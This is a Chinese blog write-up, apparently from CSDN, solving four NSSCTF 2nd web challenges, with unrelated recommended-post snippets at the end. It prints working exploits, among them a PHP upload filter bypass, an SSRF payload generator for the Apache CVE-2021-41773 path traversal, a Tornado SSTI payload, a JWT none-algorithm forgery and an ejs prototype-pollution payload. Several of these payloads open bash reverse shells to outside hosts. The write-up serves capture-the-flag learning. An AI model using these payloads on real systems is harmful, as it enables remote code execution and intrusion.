[NSSCTF 2nd] web刷题记录

已于 2023-12-11 15:49:02 修改
阅读量602 收藏 1
点赞数
分类专栏: 刷题记录 文章标签: 前端 学习 web安全 node.js php python
于 2023-10-29 12:07:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/132611093
版权

文章目录

php签到

源代码

 <?php

function waf($filename){
    $black_list = array("ph", "htaccess", "ini");
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    foreach ($black_list as $value) {
        if (stristr($ext, $value)){
            return false;
        }
    }
    return true;
}

if(isset($_FILES['file'])){
    $filename = urldecode($_FILES['file']['name']);
    $content = file_get_contents($_FILES['file']['tmp_name']);
    if(waf($filename)){
        file_put_contents($filename, $content);
    } else {
        echo "Please re-upload";
    }
} else{
    highlight_file(__FILE__);
}

简单分析一下,检查是否上传名为file的文件,然后对上传文件名url解码,然后使用 file_get_contents() 函数读取上传文件的内容。

关键点在于如何绕过waf,因为pathinfo会获取拓展名,然后黑名单检测。
这里我们的思路是利用pathinfo的特性,当传入的参数是1.php/.时 pathinfo 获取的文件的后缀名为NULL,故可以在文件名后面添加/.来实现绕过 (记得将文件名url编码)

我们首先上传文件,我的方法是修改前端代码

<!DOCTYPE html>
<html>
<body>
<form action="http://node5.anna.nssctf.cn:28751/" method="POST" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

编辑html,将上述代码复制到<body>

在这里插入图片描述
即可得到上传文件功能
然后上传名为1.php的一句话木马,bp抓包修改后缀为1.php/.
(这里我再次测试1.php.,发现上传不成功)

在这里插入图片描述上传成功后,访问./1.php/./1.php
在这里插入图片描述得到flag

在这里插入图片描述

MyBox

考点:ssrf,Apache HTTP Server路径穿越漏洞,反弹shell

非预期解

直接读取环境变量

/?url=file:///proc/1/environ

在这里插入图片描述

预期解

打开题目,发现存在参数url,成功读取用户信息
在这里插入图片描述观察到题目为python环境,读取app.py
在这里插入图片描述
源码如下

from flask import Flask, request, redirect
import requests, socket, struct
from urllib import parse
app = Flask(__name__)
 
@app.route('/')
def index():
    if not request.args.get('url'):
        return redirect('/?url=dosth')
    url = request.args.get('url')
    if url.startswith('file://'):
        with open(url[7:], 'r') as f:
            return f.read()
    elif url.startswith('http://localhost/'):
        return requests.get(url).text
    elif url.startswith('mybox://127.0.0.1:'):
        port, content = url[18:].split('/_', maxsplit=1)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(('127.0.0.1', int(port)))
        s.send(parse.unquote(content).encode())
        res = b''
        while 1:
            data = s.recv(1024)
            if data:
                res += data
            else:
                break
        return res
    return ''
 
app.run('0.0.0.0', 827)

这里url参数对应不同功能

  • 如果 URL 参数中没有指定 ‘url’,则重定向到 ‘/?url=dosth’。
  • 如果 URL 以 ‘file://’ 开头,则根据文件路径读取文件内容并返回。
  • 如果 URL 以 ‘http://localhost/’ 开头,则使用 requests 库发送 GET 请求并返回响应的文本内容。
  • 如果 URL 以 ‘mybox://127.0.0.1:’ 开头,则将剩余部分分割为端口和内容,使用 socket 连接到本地主机(127.0.0.1)的指定端口,并发送解码后的内容,然后接收并返回响应的内容。

发现一个很明显的SSRF利用点,本来得用gopher://协议打,但是这里魔改过,得把字符串gopher://换成mybox://。
关键代码如下

elif url.startswith('mybox://127.0.0.1:'):
        port, content = url[18:].split('/_', maxsplit=1)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

先发个请求包看看,请求一下不存在的PHP文件,搜集一下信息

import urllib.parse
test =\
"""GET /xxx.php HTTP/1.1
Host: 127.0.0.1:80

"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result1 = 'gopher://127.0.0.1:80/'+'_'+urllib.parse.quote(new)
result2 = result1.replace('gopher','mybox')
print(result2)

可以看到返回404,但是告诉我们服务器版本
在这里插入图片描述
这里存在Apache HTTP Server路径穿越漏洞(CVE-2021-41773)
修改下刚刚的exp

import urllib.parse
test =\
"""POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length:59

bash -c 'bash -i >& /dev/tcp/f57819674z.imdo.co/54789 0>&1'
"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result1 = 'gopher://127.0.0.1:80/'+'_'+urllib.parse.quote(new)
result2 = result1.replace('gopher','mybox')
print(result2)

注:Content-Length:59可以bp抓包复制进去看看长度
在这里插入图片描述上传,反弹shell成功
在这里插入图片描述
得到flag
在这里插入图片描述

MyHurricane

考点:Tornado、ssti

打开题目,源码如下

import tornado.ioloop 
import tornado.web 
import os BASE_DIR = os.path.dirname(__file__) 
def waf(data): 
    bl = ['\'', '"', '__', '(', ')', 'or', 'and', 'not', '{{', '}}'] 
    for c in bl: 
        if c in data: 
            return False 
        for chunk in data.split(): 
            for c in chunk: 
                if not (31 < ord(c) < 128): 
                    return False 
                return True 
class IndexHandler(tornado.web.RequestHandler): 
    def get(self): 
        with open(__file__, 'r') as f: 
            self.finish(f.read()) 
    def post(self): 
        data = self.get_argument("ssti") 
        if waf(data): 
            with open('1.html', 'w') as f: 
                f.write(f""" {data} """) 
                f.flush() 
                self.render('1.html') 
        else: self.finish('no no no') 

if __name__ == "__main__": 
    app = tornado.web.Application([ (r"/", IndexHandler), ], compiled_template_cache=False) 
    app.listen(827) 
    tornado.ioloop.IOLoop.current().start()

分析一下

  1. 首先定义了waf函数,对一些关键字进行过滤
  2. 然后定义了IndexHandler类,它继承自tornado.web.RequestHandler。定义了get()和post()方法,其中post方法接收参数ssti,然后检测黑名单,因为render内容可控,我们可以通过{{}}进行传递变量和命令执行

非预期解

读取环境变量,可以通过文件包含读取

ssti={% include /proc/1/environ %}  //或者是{% extends /proc/1/environ %}

在这里插入图片描述

预期解

利用了tornado里的变量覆盖,让_tt_utf8为eval,在渲染时时会有_tt_utf8(__tt_tmp)这样的调用

原理:可以看一下该模板的临时代码
在这里插入图片描述

由于这里过滤了很多关键字,我们可以用set和raw语法去构造payload

ssti={% set _tt_utf8=eval %}{% raw request.body_arguments[request.method][0] %}&POST=__import__('os').popen("bash -c 'bash -i >& /dev/tcp/f57819674z.imdo.co/54789 <&1'")

先定义变量,然后raw只许输出,进行反弹shell
然后将反弹shell编码一下
在这里插入图片描述在环境变量处得到flag
在这里插入图片描述

MyJs

考点:JWT空算法伪造、ejs原型链污染

打开题目发现是登录框,F12发现有源码泄露

const express = require('express');
const bodyParser = require('body-parser');
const lodash = require('lodash');
const session = require('express-session');
const randomize = require('randomatic');
const jwt = require('jsonwebtoken')
const crypto = require('crypto');
const fs = require('fs');

global.secrets = [];

express()
.use(bodyParser.urlencoded({extended: true}))
.use(bodyParser.json())
.use('/static', express.static('static'))
.set('views', './views')
.set('view engine', 'ejs')
.use(session({
    name: 'session',
    secret: randomize('a', 16),
    resave: true,
    saveUninitialized: true
}))
.get('/', (req, res) => {
    if (req.session.data) {
        res.redirect('/home');
    } else {
        res.redirect('/login')
    }
})
.get('/source', (req, res) => {
    res.set('Content-Type', 'text/javascript;charset=utf-8');
    res.send(fs.readFileSync(__filename));
})
.all('/login', (req, res) => {
    if (req.method == "GET") {
        res.render('login.ejs', {msg: null});
    }
    if (req.method == "POST") {
        const {username, password, token} = req.body;
        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        if (sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            return res.render('login.ejs', {msg: 'login error.'});
        }
        const secret = global.secrets[sid];
        const user = jwt.verify(token, secret, {algorithm: "HS256"});
        if (username === user.username && password === user.password) {
            req.session.data = {
                username: username,
                count: 0,
            }
            res.redirect('/home');
        } else {
            return res.render('login.ejs', {msg: 'login error.'});
        }
    }
})
.all('/register', (req, res) => {
    if (req.method == "GET") {
        res.render('register.ejs', {msg: null});
    }
    if (req.method == "POST") {
        const {username, password} = req.body;
        if (!username || username == 'nss') {
            return res.render('register.ejs', {msg: "Username existed."});
        }
        const secret = crypto.randomBytes(16).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret);
        const token = jwt.sign({secretid, username, password}, secret, {algorithm: "HS256"});
        res.render('register.ejs', {msg: "Token: " + token});
    }
})
.all('/home', (req, res) => {
    if (!req.session.data) {
        return res.redirect('/login');
    }
    res.render('home.ejs', {
        username: req.session.data.username||'NSS',
        count: req.session.data.count||'0',
        msg: null
    })
})
.post('/update', (req, res) => {
    if(!req.session.data) {
        return res.redirect('/login');
    }
    if (req.session.data.username !== 'nss') {
        return res.render('home.ejs', {
            username: req.session.data.username||'NSS',
            count: req.session.data.count||'0',
            msg: 'U cant change uid'
        })
    }
    let data = req.session.data || {};
    req.session.data = lodash.merge(data, req.body);
    console.log(req.session.data.outputFunctionName);
    res.redirect('/home');
})
.listen(827, '0.0.0.0')

分析一下

  1. 首先我们可以知道的是ejs模板引擎,定义密钥为长度十六的随机数
  2. /login路由下先判断是否为POST请求,从请求中接收username、password和token属性并赋值,赋值sid为token值中的secretid值,判断sid是否为空或者未定义,然后将sid的值赋值给secret,接着进行jwt的认证,如果认证成功则登陆
  3. /register路由同样先判断是否为POST请求,接收username、password参数,并且不允许注册用户名为nss,然后就是进行jwt加密
  4. /update路由下会判断是否为nss用户,如果不是则无法对uid(也就是count)进行修改,然后存在merge函数可以原型链污染

我们首先知道要用nss用户登录,但是无法注册。如果我们要直接用nss登录的话要进行jwt验证,所以我们利用空算法实现jwt伪造,从而完成登录
在这里插入图片描述
我们将算法设置为空,那么我们就可以实现空密钥登录
我们看向代码login的逻辑

const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
//省略部分代码
const secret = global.secrets[sid];
const user = jwt.verify(token, secret, {algorithm: "HS256"});

secret的值为sid的值,而sid的值又是从token中的secretid得到,所以我们只需要让secretid为空即可,伪造脚本如下

const jwt = require('jsonwebtoken');
global.secrets = [];
var user = {
    secretid: [],
    username: 'nss',
    password: '123456'
}
const secret = global.secrets[user.secretid];
var token = jwt.sign(user, secret, {algorithm: 'none'});
console.log(token);

在这里插入图片描述我们先随便注册一个(不然登陆不成功)
将得到的token进行登录,成功跳转/home
在这里插入图片描述
我们知道存在ejs模板注入
payload

{
    "__proto__":{
        "outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/5i781963p2.yicp.fun/58265 0>&1\"');var __tmp2"
    }
}

注意要修改为application/json
成功反弹shell,在环境变量得到flag
在这里插入图片描述

_rev1ve
关注
专栏目录
Flask Web Development 2nd edition
09-25
Flask web development, second edition, python web development
NSSCTF 2nd WEB
ytl_storm的博客
09-25 353
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
nssctf 2nd crypto
miao25的博客
08-29 408
👉 math做起来还是费劲,正交格还需要学习利用,好好学格😕😕。
[NSSCTF 2nd]MyJs
qq_34942239的博客
03-03 817
verify 的第三个参数options应该是用algorithms传入的数组,这里写成了 algorithm,导致加密方式为空,空加密允许空密钥即,secret可以为空。如果验证成功,表示用户提供的用户名、密码和令牌与令牌中的用户信息匹配,创建一个req.session.data。中,这里merge是原型链污染的高危函数,所有打原型链污染要在update路由打,并且用户名需要是nss.,提示用户名已存在,如果用户名为其他,定义长度为16的随机字节序列,将其转换为十六进制字符串,并作为。
ctf赛题secret.php,记一场纯JS赛——DiceCTF2021 Web题解
weixin_42509398的博客
03-12 812
// remake the `users` tabledb.exec( `DROP TABLE IF EXISTS users;`);db.exec( `CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT);`);// add an admin user with a random ...
Flask Web Development, 2nd Edition
09-08
Take full creative control of your web applications with Flask, the Python-based microframework. With the second edition of this hands-on book, you’ll learn the framework from the ground up by ...
Web Development Recipes 2nd Edition pdf
06-21
This book gives you over 40 concise solutions to today's web development problems, and introduces new solutions that will expand your skill set---proven, practical advice from authors who use these ...
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 519
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
登录功能开发 P167重点
2303_81204446的博客
09-30 307
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Web认识 -- 第一课
ZxVSaccount的博客
09-30 1125
这里是我们进入前端学习的开端,在本次更新之后我会陆续上传html,css,javaScript等相关语言的教程,有感兴趣的小伙伴们点点关注,未来我们一起学习!IE、火狐和谷歌是目前互联网上的三大浏览器,其他常用的浏览器还有苹果的Safari浏览器和欧朋浏览器等。对于一般的网站,只要兼容IE浏览器、火狐浏览器和谷歌浏览器,就能满足绝大多数用户的需求。本节主要简单介绍了一下关于HTML、CSS、JavaScript的一些基本概念,有感兴趣的朋友,点点关注我们一起学习,博主持续更新中!
第十一章 【前端】调用接口(11.1)——Vite 环境变量
qdbest的专栏
09-29 107
Vite。
前端面试经验总结2(经典问题篇)
rita_0567的博客
09-28 972
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
前端的全栈混合之路Meteor篇:RPC方法注册及调用
最新发布
分享有趣的、贴近生活的CS知识
10-03 292
Meteor 3.0中引入的异步支持和callAsync方法,使得开发者在处理前后端数据交互时更加轻松,本文简单介绍一下它的前后端用法
构建.NET Core Web API为Windows服务安装包
学习和分享
09-28 367
请注意,以上步骤仅适用于将.NET Core Web API作为Windows服务安装。如果需要更高级的功能,例如服务启动类型、日志记录等,可能需要进一步的自定义和配置。安装完成后,.NET Core Web API将作为Windows服务在目标服务器上运行。可以通过NuGet包管理器或在.csproj文件中手动添加引用。方法,以便将Web API应用程序作为Windows服务运行。创建一个新的.NET Core Web API项目或使用现有的项目。文件夹中,找到发布的Web API应用程序和安装脚本。
前端全屏模式切换
yangyanqin2545的博客
09-27 632
【代码】前端全屏模式切换。
浏览器前端向后端提供服务
dgiij的博客
10-03 322
它其实有浏览器端的完整模块,但是我觉得人脸识别在实际场景中应用,全部在前端做识别不太安全,因为浏览器侧未必完全安全可控,可以考虑人脸登记注册前端将照片和用户绑定信息发到后端,后端识别出描述信息保存,识别阶段,浏览器调用摄像头识别出人脸描述信息,发往后端,在后端进行匹配验证,这样会更安全可靠一些。但是出现了一个状况,后端依赖库中有部分依赖不翻墙是下不下来。WEB后端向浏览器前端提供服务是最常见的场景,前端向后端的接口发起GET或者POST请求,后端收到请求后执行服务器端任务进行处理,完成后向前端发送响应。
Open WebUI部署自己的大模型
qq_52053775的博客
09-29 301
允许用户定义不同采样器的顺序,例如先应用 top_p 再调整 temperature,以更好地控制生成行为。
Java Web核心技术阶段的学习要点
2401_87352036的博客
09-27 541
JavaWeb核心技术阶段的学习要点涵盖了多个关键技术和概念,这些技术和概念对于开发动Web应用程序至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值